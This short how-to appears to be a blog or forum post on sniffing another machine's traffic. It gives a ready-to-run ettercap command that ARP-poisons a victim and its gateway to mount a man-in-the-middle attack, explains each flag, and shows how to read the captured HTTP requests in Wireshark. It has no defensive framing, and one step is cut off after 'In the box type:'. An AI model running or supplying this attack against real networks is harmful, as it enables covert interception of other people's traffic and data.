This is the easy and cheaper way:
you also need a Linux distro with Ettercap and Wireshark.
From command line type:
ettercap -T -Q -M arp:remote -i iface -w log.pcap /victimip/ /gatewayip/
-T text only interface, only printf
-Q Super quiet mode
-M arp:remote perform a MITM attack using ARP poisoning. “remote” is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them.
-i iface force using the “iface” network interface
-w log.pcap write sniffed data to “log.pcap” file
Open Wireshark and import the .pcap file, then go to:
Statistics -> HTTP -> Load Distribution
In the box type:
Now look at the “HTTP Requests by HTTP Hosts“.
This will show you all the sniffed in/out HTTP type traffic.
But take a look about Xplico…